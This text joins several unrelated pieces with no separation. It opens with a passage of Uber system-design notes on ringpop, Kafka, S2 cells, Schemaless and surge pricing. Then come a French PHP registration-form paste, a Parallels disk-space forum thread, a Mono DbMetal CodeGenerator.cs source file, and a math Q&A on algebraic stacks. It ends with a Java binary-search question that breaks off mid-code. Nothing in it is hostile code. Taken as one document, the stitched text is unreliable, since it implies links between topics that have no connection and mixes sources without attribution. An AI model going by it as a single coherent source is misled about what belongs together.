4. The solution to scaling is Node.js with ringpop: a fast RPC protocol with gossip via the SWIM protocol, on top of a consistent hash ring.
5. Ringpop is a library that brings cooperation and coordination to distributed applications. It maintains a consistent hash ring on top of a membership protocol and provides request forwarding as a routing convenience. It can be used to shard your application in a way that's scalable and fault tolerant.
6. SWIM gossip is used to learn which node does what and who is responsible for which geo's computation.
7. With gossip it's easy to add and remove nodes, so scaling is easy.
8. The SWIM gossip protocol also combines health checks with membership changes as part of the same protocol.
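A consistent hash ring like the one ringpop maintains can be sketched compactly (an illustrative toy, not ringpop's actual implementation): each node is hashed onto the ring at several virtual points, a key is owned by the first node clockwise from its hash, and removing a node only remaps the keys that node owned.

```python
import bisect
import hashlib

def _hash(key: str) -> int:
    return int(hashlib.md5(key.encode()).hexdigest(), 16)

class HashRing:
    def __init__(self, nodes=(), vnodes=100):
        self.vnodes = vnodes
        self._keys = []    # sorted hash positions on the ring
        self._owners = []  # node owning each position
        for n in nodes:
            self.add(n)

    def add(self, node):
        # Place vnodes virtual points for this node on the ring.
        for i in range(self.vnodes):
            h = _hash(f"{node}#{i}")
            idx = bisect.bisect(self._keys, h)
            self._keys.insert(idx, h)
            self._owners.insert(idx, node)

    def remove(self, node):
        pairs = [(h, n) for h, n in zip(self._keys, self._owners) if n != node]
        self._keys = [h for h, _ in pairs]
        self._owners = [n for _, n in pairs]

    def get(self, key):
        # The first virtual point clockwise from the key's hash owns the key.
        idx = bisect.bisect(self._keys, _hash(key)) % len(self._keys)
        return self._owners[idx]

ring = HashRing(["node-a", "node-b", "node-c"])
owner = ring.get("cell-9q8yy")
other = next(n for n in ("node-a", "node-b", "node-c") if n != owner)
ring.remove(other)
assert ring.get("cell-9q8yy") == owner  # only keys of the removed node move
```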
How are supply messages sent and saved?
Apache Kafka is used as the data hub.
Supply (the cabs) uses Kafka's APIs to send accurate GPS locations to the datacenter.
Once the GPS locations are loaded into Kafka, they are slowly persisted to the respective worker nodes' main memory, and also to the DB while the trip is in progress.
How do Maps and routing work?
Before Uber launches operations in a new area, we define and onboard a new region to our map technology stack. Inside this map region, we define subregions labeled with grades A, B, AB, and C, as follows:
Grade A: A subregion of Uber Territory covering urban centers and commute areas that make up approximately 90 percent of all expected Uber traffic. With that in mind, it is of critical importance to ensure the highest map quality of grade A map regions.
Grade B: A subregion of Uber Territory covering rural and suburban areas that might be less populated or less traveled by Uber customers.
Grade AB: A union of grade A and B subregions.
Grade C: A set of highway corridors connecting various Uber Territories.
GeoSpatial design:
The earth is a sphere. It's hard to do summarization and approximation based purely on longitude and latitude.
So Uber divides the earth into tiny cells using the Google S2 library. Each cell has a unique cell ID.
When DISCO needs to find the supply near a location, a circle's worth of coverage is calculated, centered on where the rider is located.
The read load is scaled through the use of replicas. If more read capacity is needed the replica factor can be increased.
How uber builds the Map?
1. Trace coverage: A comparative coverage metric, trace coverage identifies missing road segments or incorrect road geometry. The computation uses two inputs: map data under testing and historic GPS traces of all Uber rides taken over a certain period of time. We overlay those GPS traces onto the map, comparing and matching them with road segments. If we find GPS traces where no road is shown, we can infer that our map is missing a road segment and take steps to fix the deficiency.
2. Preferred access (pick-up) point accuracy: Pick-up points are an extremely important metric for the rider experience, especially at large venues such as airports and stadiums. For this metric, we compute the distance of an address or place's location, as shown by the map pin in Figure 4, below, from all actual pick-up and drop-off points used by drivers. We then set the closest actual location to be the preferred access point for the said location pin. When a rider requests the location indicated by the map pin, the map guides the driver to the preferred access point. We continually compute this metric with the latest actual pick-up and drop-off locations to ensure the freshness and accuracy of the suggested preferred access points.
How ETAs are calculated?
That means DISCO must track the cabs available to serve riders.
But it shouldn't just handle currently available supply, i.e. cabs ready to take a customer; it should also track the cars about to finish a ride.
For example:
1. A cab that is about to finish a ride near the demand (rider) can be a better match than a cab that is far away from the demand.
2. Sometimes the route of an ongoing trip is revised because a cab near the demand came online.
When Uber started, every city's data was separated into its own tables/DB; this was hard to maintain.
Now all cities' computation happens in the same system. Since the workers and DB nodes are distributed by region, a demand request is sent to the nearest datacenter.
Routing and calculating ETAs are important components in Uber, as they directly impact ride matching and earnings.
So Uber uses historical travel times to calculate ETAs.
You can use AI/simulation-based algorithms, or simply Dijkstra's algorithm, to find the best route.
You can also use the driver app's GPS location data to predict the traffic condition on any given road, since there are so many Uber cars on the road sending GPS locations every 4 seconds.
The whole road network is modeled as a graph. Nodes represent intersections, and edges represent road segments. The edge weights represent a metric of interest: often either the road segment distance or the time take it takes to travel through it. Concepts such as one-way streets, turn restrictions, turn costs, and speed limits are modeled in the graph as well.
One simple example you can try at home is Dijkstra's search algorithm, which has become the foundation for most modern routing algorithms today.
OSRM is based on contraction hierarchies. Systems based on contraction hierarchies achieve fast performance, taking just a few milliseconds to compute a route, by preprocessing the routing graph.
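As a reference point, Dijkstra over a time-weighted road graph fits in a dozen lines (a textbook sketch; production routers add contraction hierarchies, turn costs, and live traffic on top):

```python
import heapq

def eta_seconds(graph, src, dst):
    """graph: node -> list of (neighbor, travel_time_seconds) edges."""
    dist = {src: 0.0}
    pq = [(0.0, src)]
    while pq:
        d, u = heapq.heappop(pq)
        if u == dst:
            return d
        if d > dist.get(u, float("inf")):
            continue  # stale queue entry
        for v, w in graph.get(u, ()):
            nd = d + w
            if nd < dist.get(v, float("inf")):
                dist[v] = nd
                heapq.heappush(pq, (nd, v))
    return float("inf")  # unreachable

# Hypothetical tiny road network: the slower highway edge loses here.
roads = {
    "pickup":   [("junction", 60), ("highway", 30)],
    "junction": [("dropoff", 60)],
    "highway":  [("dropoff", 120)],
}
assert eta_seconds(roads, "pickup", "dropoff") == 120.0
```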
Databases:
A lot of different databases are used. The oldest systems were built on Postgres.
Redis is used a lot; some instances sit behind Twemproxy, and some behind a custom clustering system.
MySQL: built on these requirements:
• Linearly add capacity by adding more servers (horizontally scalable)
• Write availability, with buffering using Redis
• Triggers should fire when there is a change in the instance
• No downtime for any operation (expanding storage, backup, adding indexes, adding data, and so forth).
You can use Google's Bigtable or any schema-less database.
Trip data Storage in Schemaless
Uber built its own distributed column store orchestrating a bunch of MySQL instances, called Schemaless.
Schemaless is a key-value store which allows you to save any JSON data without strict schema validation, in a schemaless fashion (hence the name).
It has append-only sharded MySQL with buffered writes to support failing MySQL masters, and a publish-subscribe feature for data change notification, which we call triggers.
Schemaless supports global indexes over the data.
Trip data is generated at different points in time, from pickup drop-off to billing, and these various pieces of info arrive asynchronously as the people involved in the trip give their feedback, or background processes execute.
A trip is driven by a partner, taken by a rider, and has timestamps for its beginning and end. This info constitutes the base trip, and from it we calculate the cost of the trip (the fare), which is what the rider is billed. After the trip ends, we might have to adjust the fare, either crediting or debiting the rider. We might also add notes to it, given feedback from the rider or driver (shown with asterisks in the diagram above). Or we might have to attempt to bill multiple credit cards, in case the first is expired or denied.
Some of the Dispatch services are keeping state in Riak.
Geospatial data and trips DB
The design goal is to handle a million GPS point writes per second.
The read load is even higher, since for every rider we need to show at least 10 nearby cabs.
Using geohashes and the Google S2 library, the GPS locations can be queried.
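For illustration, a geohash is just interleaved binary subdivision of longitude and latitude, base32-encoded. This compact version reproduces the classic textbook example (a real system would use a library, or S2 as mentioned above):

```python
BASE32 = "0123456789bcdefghjkmnpqrstuvwxyz"

def geohash(lat, lng, precision=11):
    lat_rng, lng_rng = [-90.0, 90.0], [-180.0, 180.0]
    bits, nbits, even, out = 0, 0, True, ""
    while len(out) < precision:
        # Alternate between longitude and latitude, halving the range each step.
        rng, val = (lng_rng, lng) if even else (lat_rng, lat)
        mid = (rng[0] + rng[1]) / 2
        bit = int(val >= mid)
        rng[0 if bit else 1] = mid  # keep the half containing val
        bits = (bits << 1) | bit
        nbits += 1
        even = not even
        if nbits == 5:  # emit one base32 character per 5 bits
            out += BASE32[bits]
            bits, nbits = 0, 0
    return out

# The canonical example coordinate from the geohash literature:
assert geohash(57.64911, 10.40744) == "u4pruydqqvj"
```

Nearby points share a common geohash prefix, which is what makes range scans for "cabs near this rider" cheap in a key-value store.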
Now let’s talk about ANALYTICS
Log collection and analysis
Every microservice is configured to push its logs to a distributed Kafka cluster; then, using Logstash, we can apply filters on the messages and redirect them to different sinks,
for example, Elasticsearch for log analysis using Kibana/Grafana.
1. Track HTTP APIs
2. Manage profiles
3. Collect feedback and ratings
4. Promotions and coupons, etc.
5. Fraud detection:
   • Payment fraud
   • Incentive abuse
   • Compromised accounts
Load balance:
Layer 7, Layer 4, and Layer 3 load balancers are used:
• Layer 7 for application load balancing
• Layer 4 based on IP + UDP/TCP, or DNS-based load balancing
• Layer 3 based on the IP address only
Post-trip actions:
Once the trip is completed, we need to perform these actions via scheduling:
• Collect ratings.
• Send emails.
• Update databases.
• Schedule payments.
PRICE AND SURGE:
The price is increased when there is more demand and less supply, with the help of prediction algorithms.
According to Uber, surge helps match supply to demand: by increasing the price, more cabs come onto the road when demand is high.
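In its simplest form, surge is just a demand/supply ratio clamped to a range. The heuristic below is hypothetical and purely for illustration; Uber's real pricing uses prediction models per area and time:

```python
def surge_multiplier(open_requests, idle_drivers, cap=3.0):
    # Hypothetical heuristic: price scales with the demand/supply imbalance,
    # never below 1.0x and never above the cap.
    if idle_drivers <= 0:
        return cap
    ratio = open_requests / idle_drivers
    return max(1.0, min(cap, round(ratio, 1)))

assert surge_multiplier(10, 10) == 1.0    # balanced market: no surge
assert surge_multiplier(15, 10) == 1.5    # 1.5x when demand outstrips supply
assert surge_multiplier(100, 10) == 3.0   # clamped at the cap
```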
How To Handle Total Datacenter Failure?
• It doesn't happen very often, but there could be an unexpected cascading failure, or an upstream network provider could fail.
• Uber maintains a backup datacenter, and the switches are in place to route everything over to it.
• The problem is that the data for in-process trips may not be in the backup datacenter. Rather than replicate data, they use driver phones as a source of trip data.
• What happens is that the Dispatch system periodically sends an encrypted State Digest down to driver phones. Now let's say there's a datacenter failover. The next time a driver phone sends a location update, the Dispatch system will detect that it doesn't know about this trip and ask the phone for the State Digest. The Dispatch system then updates itself from the State Digest, and the trip keeps going like nothing happened.
Untitled
a guest Feb 24th, 2020
<?php
// database connection
require_once('inc/connec.php');

$post = [];
$erreur = [];
$voirErreur = false;

// only validate once the form has been submitted
if (!empty($_POST)) {

    // sanitize every submitted field
    foreach ($_POST as $key => $value) {
        $post[$key] = htmlspecialchars($value);
    }

    // length checks (note: the closing parenthesis of strlen() must come
    // before the comparison, i.e. strlen($post['nom']) > 255)
    if (strlen($post['nom']) < 2 || strlen($post['nom']) > 255) {
        $erreur[] = " Votre nom ne doit pas dépasser 255 caractères !";
    }

    if (strlen($post['prenom']) < 2 || strlen($post['prenom']) > 255) {
        $erreur[] = " Votre prénom ne doit pas dépasser 255 caractères !";
    }

    if (strlen($post['username']) < 2 || strlen($post['username']) > 255) {
        $erreur[] = " Votre pseudo ne doit pas dépasser 255 caractères !";
    }

    if (strlen($post['reponse']) < 2 || strlen($post['reponse']) > 255) {
        $erreur[] = " Votre reponse ne doit pas dépasser 255 caractères !";
    }

    if (count($erreur) > 0) {
        $voirErreur = true;
        $nom = $post['nom'];
        $prenom = $post['prenom'];
        $username = $post['username'];
        $reponse = $post['reponse'];
    } else {
        // hash the password
        $password = password_hash($post['password'], PASSWORD_ARGON2I);
        // insert the member
        $insertmbr = $bdd->prepare('INSERT INTO membres (nom, prenom, username, password, question, reponse) VALUES (:nom, :prenom, :username, :password, :question, :reponse)');

        $insertmbr->bindValue(':nom', $post['nom'], PDO::PARAM_STR);
        $insertmbr->bindValue(':prenom', $post['prenom'], PDO::PARAM_STR);
        $insertmbr->bindValue(':username', $post['username'], PDO::PARAM_STR);
        $insertmbr->bindValue(':password', $password);
        $insertmbr->bindValue(':question', $post['question'], PDO::PARAM_STR);
        $insertmbr->bindValue(':reponse', $post['reponse'], PDO::PARAM_STR);

        if ($insertmbr->execute()) {
            header('Location: connexion.php?id=' . $bdd->lastInsertId());
            exit;
        }
    }
}
?>
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="style-css/inscription.css">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
    <title>Page d'inscription</title>
</head>

<body>
    <div>
        <h1> Groupement Banque-Assurance Français</h1>
    </div>
    <?php
    if ($voirErreur) {
        echo implode('<br>', $erreur);
    }
    ?>
    <!-- Registration form -->
    <form class="form" method="post" action="">
        <h2> Formulaire d'inscription</h2>
        <div>
            <label class="form-label" for="nom"> Nom </label> <br/>
            <input class="form-input" type="text" placeholder="nom" name="nom" id="nom" value="<?php if(isset($nom)) { echo $nom; }?>">
        </div>

        <div>
            <label class="form-label" for="prenom"> Prenom </label> <br/>
            <input class="form-input" type="text" placeholder="prenom" name="prenom" id="prenom" value="<?php if(isset($prenom)) { echo $prenom; }?>">
        </div>

        <div>
            <label class="form-label" for="username"> Pseudonyme </label> <br/>
            <input class="form-input" type="text" placeholder="username" name="username" id="username" value="<?php if(isset($username)) { echo $username; }?>">
        </div>

        <div>
            <label class="form-label" for="password"> Mot de passe </label> <br/>
            <input class="form-input" type="password" placeholder="password" name="password" id="password">
        </div>

        <div>
            <label class="form-label" for="question"> Question secrète </label>
            <select name="question" id="question" class="form-label">
                <option value="1"> Quel est le nom de votre mère ? </option>
                <option value="2"> Quelle est la destination de vos rêves ? </option>
                <option value="3"> Quel est le métier de votre père ? </option>
            </select>
        </div>

        <div>
            <label class="form-label" for="reponse"> Réponse question secrète</label> <br/>
            <input class="form-input" type="text" placeholder="reponse" name="reponse" id="reponse">
        </div>

        <div>
            <input type="submit" name="inscription" value="Valider">
        </div>
        <p> Si vous possédez déjà un compte, connectez-vous <a href="connexion.php">ICI</a>! </p>
    </form>
    <script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
</body>
</html>
Parallels didn't return all VM space
Discussion in 'General Questions' started by ddollas, Jun 19, 2007.
1. ddollas:
I recently used Parallels just to test-drive Solaris 10. My hard drive went from 35 GB free to 29-something; however, once I was done and deleted the Solaris VM, my Mac now tells me that I have 34 GB of space. Any idea what happened to the remaining space, and how can I recover it without getting rid of Parallels completely?
2. dkp:
How did you delete the VM?
3. ddollas:
I clicked delete and used the delete-assist wizard.
4. mmischke:
Look in ~/Library/Parallels (assuming you created your VMs in the default location) and see if there's a folder with the same name you gave your Solaris VM. If that folder still exists, you can just drag it to the trash. If no such folder exists, then the missing disk space is probably not Parallels-related.
File: CodeGenerator.cs
package info: mono 4.6.2.7+dfsg-1
• area: main
• in suites: stretch
• size: 778,148 kB
file content: 466 lines, 18,820 bytes
#region MIT license
//
// MIT license
//
// Copyright (c) 2007-2008 Jiri Moudry, Pascal Craponne
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//
#endregion
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using DbLinq.Data.Linq;
using DbLinq.Schema;
using DbLinq.Schema.Dbml;
using DbLinq.Schema.Dbml.Adapter;
using DbLinq.Util;
using Type = System.Type;
#if MONO_STRICT
using System.Data.Linq;
#endif
namespace DbMetal.Generator.Implementation.CodeTextGenerator
{
#if !MONO_STRICT
public
#endif
abstract partial class CodeGenerator : ICodeGenerator
{
public abstract string LanguageCode { get; }
public abstract string Extension { get; }
protected class MassDisposer : IDisposable
{
public IList<IDisposable> Disposables = new List<IDisposable>();
public void Dispose()
{
for (int index = Disposables.Count - 1; index >= 0; index--)
{
Disposables[index].Dispose();
}
}
}
protected abstract CodeWriter CreateCodeWriter(TextWriter textWriter);
public void Write(TextWriter textWriter, Database dbSchema, GenerationContext context)
{
if (dbSchema == null || dbSchema.Tables == null)
{
//Logger.Write(Level.Error, "CodeGenAll ERROR: incomplete dbSchema, cannot start generating code");
return;
}
context["namespace"] = string.IsNullOrEmpty(context.Parameters.Namespace)
? dbSchema.ContextNamespace
: context.Parameters.Namespace;
context["database"] = dbSchema.Name;
context["generationTime"] = context.Parameters.GenerateTimestamps
? DateTime.Now.ToString("u")
: "[TIMESTAMP]";
context["class"] = dbSchema.Class;
using (var codeWriter = CreateCodeWriter(textWriter))
{
WriteBanner(codeWriter, context);
WriteUsings(codeWriter, context);
string contextNamespace = context.Parameters.Namespace;
if (string.IsNullOrEmpty(contextNamespace))
contextNamespace = dbSchema.ContextNamespace;
string entityNamespace = context.Parameters.Namespace;
if (string.IsNullOrEmpty(entityNamespace))
entityNamespace = dbSchema.EntityNamespace;
bool generateDataContext = true;
var types = context.Parameters.GenerateTypes;
if (types.Count > 0)
generateDataContext = types.Contains(dbSchema.Class);
if (contextNamespace == entityNamespace)
{
using (WriteNamespace(codeWriter, contextNamespace))
{
if (generateDataContext)
WriteDataContext(codeWriter, dbSchema, context);
WriteClasses(codeWriter, dbSchema, context);
}
}
else
{
if (generateDataContext)
using (WriteNamespace(codeWriter, contextNamespace))
WriteDataContext(codeWriter, dbSchema, context);
using (WriteNamespace(codeWriter, entityNamespace))
WriteClasses(codeWriter, dbSchema, context);
}
}
}
private void WriteBanner(CodeWriter writer, GenerationContext context)
{
using (writer.WriteRegion(context.Evaluate("Auto-generated classes for ${database} database on ${generationTime}")))
{
// http://www.network-science.de/ascii/
// http://www.network-science.de/ascii/ascii.php?TEXT=MetalSequel&x=14&y=14&FONT=_all+fonts+with+your+text_&RICH=no&FORM=left&STRE=no&WIDT=80
writer.WriteCommentLines(
@"
____ _ __ __ _ _
| _ \| |__ | \/ | ___| |_ __ _| |
| | | | '_ \| |\/| |/ _ \ __/ _` | |
| |_| | |_) | | | | __/ || (_| | |
|____/|_.__/|_| |_|\___|\__\__,_|_|
");
writer.WriteCommentLines(context.Evaluate("Auto-generated from ${database} on ${generationTime}"));
writer.WriteCommentLines("Please visit http://linq.to/db for more information");
}
}
private void WriteUsings(CodeWriter writer, GenerationContext context)
{
writer.WriteUsingNamespace("System");
writer.WriteUsingNamespace("System.Data");
writer.WriteUsingNamespace("System.Data.Linq.Mapping");
writer.WriteUsingNamespace("System.Diagnostics");
writer.WriteUsingNamespace("System.Reflection");
#if MONO_STRICT
writer.WriteUsingNamespace("System.Data.Linq");
#else
writer.WriteLine("#if MONO_STRICT");
writer.WriteUsingNamespace("System.Data.Linq");
writer.WriteLine("#else // MONO_STRICT");
writer.WriteUsingNamespace("DbLinq.Data.Linq");
writer.WriteUsingNamespace("DbLinq.Vendor");
writer.WriteLine("#endif // MONO_STRICT");
#endif
// writer.WriteUsingNamespace("System");
// writer.WriteUsingNamespace("System.Collections.Generic");
// writer.WriteUsingNamespace("System.ComponentModel");
// writer.WriteUsingNamespace("System.Data");
// writer.WriteUsingNamespace("System.Data.Linq.Mapping");
// writer.WriteUsingNamespace("System.Diagnostics");
// writer.WriteUsingNamespace("System.Linq");
// writer.WriteUsingNamespace("System.Reflection");
// writer.WriteUsingNamespace("System.Text");
//#if MONO_STRICT
// writer.WriteUsingNamespace("System.Data.Linq");
//#else
// writer.WriteUsingNamespace("DbLinq.Data.Linq");
// writer.WriteUsingNamespace("DbLinq.Data.Linq.Mapping");
//#endif
// now, we write usings required by implemented interfaces
foreach (var implementation in context.Implementations())
implementation.WriteHeader(writer, context);
// write namespaces for members attributes
foreach (var memberAttribute in context.Parameters.MemberAttributes)
WriteUsingNamespace(writer, GetNamespace(memberAttribute));
writer.WriteLine();
}
/// <summary>
/// Writes a using, if given namespace is not null or empty
/// </summary>
/// <param name="writer"></param>
/// <param name="nameSpace"></param>
protected virtual void WriteUsingNamespace(CodeWriter writer, string nameSpace)
{
if (!string.IsNullOrEmpty(nameSpace))
writer.WriteUsingNamespace(nameSpace);
}
protected virtual string GetNamespace(string fullName)
{
var namePartIndex = fullName.LastIndexOf('.');
// if we have a dot, we have a namespace
if (namePartIndex < 0)
return null;
return fullName.Substring(0, namePartIndex);
}
private IDisposable WriteNamespace(CodeWriter writer, string nameSpace)
{
if (!string.IsNullOrEmpty(nameSpace))
return writer.WriteNamespace(nameSpace);
return null;
}
private void WriteDataContext(CodeWriter writer, Database schema, GenerationContext context)
{
if (schema.Tables.Count == 0)
{
writer.WriteCommentLine("L69 no tables found");
return;
}
string contextBase = schema.BaseType;
var contextBaseType = string.IsNullOrEmpty(contextBase)
? typeof(DataContext)
: TypeLoader.Load(contextBase);
// in all cases, get the literal type name from loaded type
contextBase = writer.GetLiteralType(contextBaseType);
var specifications = SpecificationDefinition.Partial;
if (schema.AccessModifierSpecified)
specifications |= GetSpecificationDefinition(schema.AccessModifier);
else
specifications |= SpecificationDefinition.Public;
if (schema.ModifierSpecified)
specifications |= GetSpecificationDefinition(schema.Modifier);
using (writer.WriteClass(specifications, schema.Class, contextBase))
{
WriteDataContextExtensibilityDeclarations(writer, schema, context);
WriteDataContextCtors(writer, schema, contextBaseType, context);
WriteDataContextTables(writer, schema, context);
WriteDataContextProcedures(writer, schema, context);
}
}
private void WriteDataContextTables(CodeWriter writer, Database schema, GenerationContext context)
{
foreach (var table in schema.Tables)
WriteDataContextTable(writer, table);
writer.WriteLine();
}
protected abstract void WriteDataContextTable(CodeWriter writer, Table table);
protected virtual Type GetType(string literalType, bool canBeNull)
{
bool isNullable = literalType.EndsWith("?");
if (isNullable)
literalType = literalType.Substring(0, literalType.Length - 1);
bool isArray = literalType.EndsWith("[]");
if (isArray)
literalType = literalType.Substring(0, literalType.Length - 2);
Type type = GetSimpleType(literalType);
if (type == null)
return type;
if (isArray)
type = type.MakeArrayType();
if (isNullable)
type = typeof(Nullable<>).MakeGenericType(type);
else if (canBeNull)
{
if (type.IsValueType)
type = typeof(Nullable<>).MakeGenericType(type);
}
return type;
}
private Type GetSimpleType(string literalType)
{
switch (literalType)
{
case "string":
return typeof(string);
case "long":
return typeof(long);
case "short":
return typeof(short);
case "int":
return typeof(int);
case "char":
return typeof(char);
case "byte":
return typeof(byte);
case "float":
return typeof(float);
case "double":
return typeof(double);
case "decimal":
return typeof(decimal);
case "bool":
return typeof(bool);
case "DateTime":
return typeof(DateTime);
case "object":
return typeof(object);
default:
return Type.GetType(literalType);
}
}
protected string GetAttributeShortName<T>()
where T : Attribute
{
string literalAttribute = typeof(T).Name;
string end = "Attribute";
if (literalAttribute.EndsWith(end))
literalAttribute = literalAttribute.Substring(0, literalAttribute.Length - end.Length);
return literalAttribute;
}
protected AttributeDefinition NewAttributeDefinition<T>()
where T : Attribute
{
return new AttributeDefinition(GetAttributeShortName<T>());
}
protected IDisposable WriteAttributes(CodeWriter writer, params AttributeDefinition[] definitions)
{
var massDisposer = new MassDisposer();
foreach (var definition in definitions)
massDisposer.Disposables.Add(writer.WriteAttribute(definition));
return massDisposer;
}
protected IDisposable WriteAttributes(CodeWriter writer, params string[] definitions)
{
var attributeDefinitions = new List<AttributeDefinition>();
foreach (string definition in definitions)
attributeDefinitions.Add(new AttributeDefinition(definition));
return WriteAttributes(writer, attributeDefinitions.ToArray());
}
protected virtual SpecificationDefinition GetSpecificationDefinition(AccessModifier accessModifier)
{
switch (accessModifier)
{
case AccessModifier.Public:
return SpecificationDefinition.Public;
case AccessModifier.Internal:
return SpecificationDefinition.Internal;
case AccessModifier.Protected:
return SpecificationDefinition.Protected;
case AccessModifier.ProtectedInternal:
return SpecificationDefinition.Protected | SpecificationDefinition.Internal;
case AccessModifier.Private:
return SpecificationDefinition.Private;
default:
throw new ArgumentOutOfRangeException("accessModifier");
}
}
protected virtual SpecificationDefinition GetSpecificationDefinition(ClassModifier classModifier)
{
switch (classModifier)
{
case ClassModifier.Sealed:
return SpecificationDefinition.Sealed;
case ClassModifier.Abstract:
return SpecificationDefinition.Abstract;
default:
throw new ArgumentOutOfRangeException("classModifier");
}
}
protected virtual SpecificationDefinition GetSpecificationDefinition(MemberModifier memberModifier)
{
switch (memberModifier)
{
case MemberModifier.Virtual:
return SpecificationDefinition.Virtual;
case MemberModifier.Override:
return SpecificationDefinition.Override;
case MemberModifier.New:
return SpecificationDefinition.New;
case MemberModifier.NewVirtual:
return SpecificationDefinition.New | SpecificationDefinition.Virtual;
default:
throw new ArgumentOutOfRangeException("memberModifier");
}
}
/// <summary>
/// The "custom types" are types related to a class
/// Currently, we only support enums (non-standard)
/// </summary>
/// <param name="writer"></param>
/// <param name="table"></param>
/// <param name="schema"></param>
/// <param name="context"></param>
protected virtual void WriteCustomTypes(CodeWriter writer, Table table, Database schema, GenerationContext context)
{
// detect required custom types
foreach (var column in table.Type.Columns)
{
var extendedType = column.ExtendedType;
var enumType = extendedType as EnumType;
if (enumType != null)
{
context.ExtendedTypes[column] = new GenerationContext.ExtendedTypeAndName
{
Type = column.ExtendedType,
Table = table
};
}
}
var customTypesNames = new List<string>();
// create names and avoid conflits
foreach (var extendedTypePair in context.ExtendedTypes)
{
if (extendedTypePair.Value.Table != table)
continue;
if (string.IsNullOrEmpty(extendedTypePair.Value.Type.Name))
{
string name = extendedTypePair.Key.Member + "Type";
for (; ; )
{
if ((from t in context.ExtendedTypes.Values where t.Type.Name == name select t).FirstOrDefault() == null)
{
extendedTypePair.Value.Type.Name = name;
break;
}
// at 3rd loop, it will look ugly, however we will never go there
name = extendedTypePair.Value.Table.Type.Name + name;
}
}
customTypesNames.Add(extendedTypePair.Value.Type.Name);
}
// write custom types
if (customTypesNames.Count > 0)
{
using (writer.WriteRegion(string.Format("Custom type definition for {0}", string.Join(", ", customTypesNames.ToArray()))))
{
// write types
foreach (var extendedTypePair in context.ExtendedTypes)
{
if (extendedTypePair.Value.Table != table)
continue;
var extendedType = extendedTypePair.Value.Type;
var enumValue = extendedType as EnumType;
if (enumValue != null)
{
writer.WriteEnum(GetSpecificationDefinition(extendedTypePair.Key.AccessModifier),
enumValue.Name, enumValue);
}
}
}
}
}
}
}
I'm wondering what the precise relationship is between an algebraic stack being locally of finite presentation and being limit preserving. Under some mild hypotheses on the diagonal (in force throughout the book), Prop. 4.18 of the book by Laumon and Moret-Bailly shows that a stack locally of finite presentation over some base scheme is limit preserving; I don't think the hypotheses on the diagonal are used here, and indeed I think I can piece together a proof pretty easily using the assumptions of the Stacks project.
Now, I'm wondering if the converse is true. Some reasons to think it might be: in Artin's "Versal Deformations and Algebraic Stacks", he defines limit preserving, and says that it is what he had previously referred to as locally of finite presentation. Also, for algebraic spaces we have http://stacks.math.columbia.edu/tag/05N0 which shows that the two conditions are equivalent (and equivalent to being limit preserving on objects, unsurprisingly).
A reason to think they might not be equivalent: I haven't seen this statement anywhere in the literature.
1 Answer
Suppose that $\mathcal{X}$ is an algebraic stack which is limit preserving on objects over $S$. Suppose that $U \to \mathcal{X}$ is a smooth surjective map from a scheme. Then $U \to S$ is limit preserving by the results of Section Tag 06CT. Thus $U$ is locally of finite presentation over S (for example by the reference you gave). This exactly means that $\mathcal{X} \to S$ is locally of finite presentation.
I didn't check the direction you said was OK, but if it is, then this also means there is no difference between "limit preserving on objects" and "limit preserving" for algebraic stacks over schemes. There is a difference in general (for stacks in groupoids over schemes for example). Anyway, this is one of the many things missing from the Stacks project (thanks for pointing it out). The Stacks project takes contributions (by email or via git pull requests) if you are so inclined.
Thank you very much - this is great. I will try to find the time soon to check the other direction, and maybe even write it up for the Stacks project. – stacksnovice Jan 19 at 16:49
Flink.Thomas – 5 months ago
Java Question
Binary search program printing false
Hello everyone, I'm working on a binary search program. My algorithm is correct, but when I run the program with the driver program I get the value "false" printed back repeatedly instead of a table that looks like this:
Table output(LINK)
Here are my driver program and main program.
public class TestResulter {
public static void main(String[] args) {
//Resulter resulter = new Resulter();
int numberOfItems = 10000;
int item;
int a[ ] = new int[ numberOfItems ];
for( int i = 0; i < 20; i++ )
{
item = Resulter.randomitem( a );
System.out.println( Resulter.binarySearch( a , item ) );
}
}
}
And my main program, with the binarySearch algorithm:
import java.util.Random;
public class Resulter extends TestResulter {
private static class Result {
public Boolean found; // true if found, false if not found
public int index; // index where item was found, -1 if not found
public int steps; // number of comparisons performed
public Result(boolean f, int ind, int st) {
found = f;
index = ind;
steps = st;
}
@Override
public String toString() {
return "Result [found=" + found + ", index=" + index + ", steps=" + steps + "]";
}
}
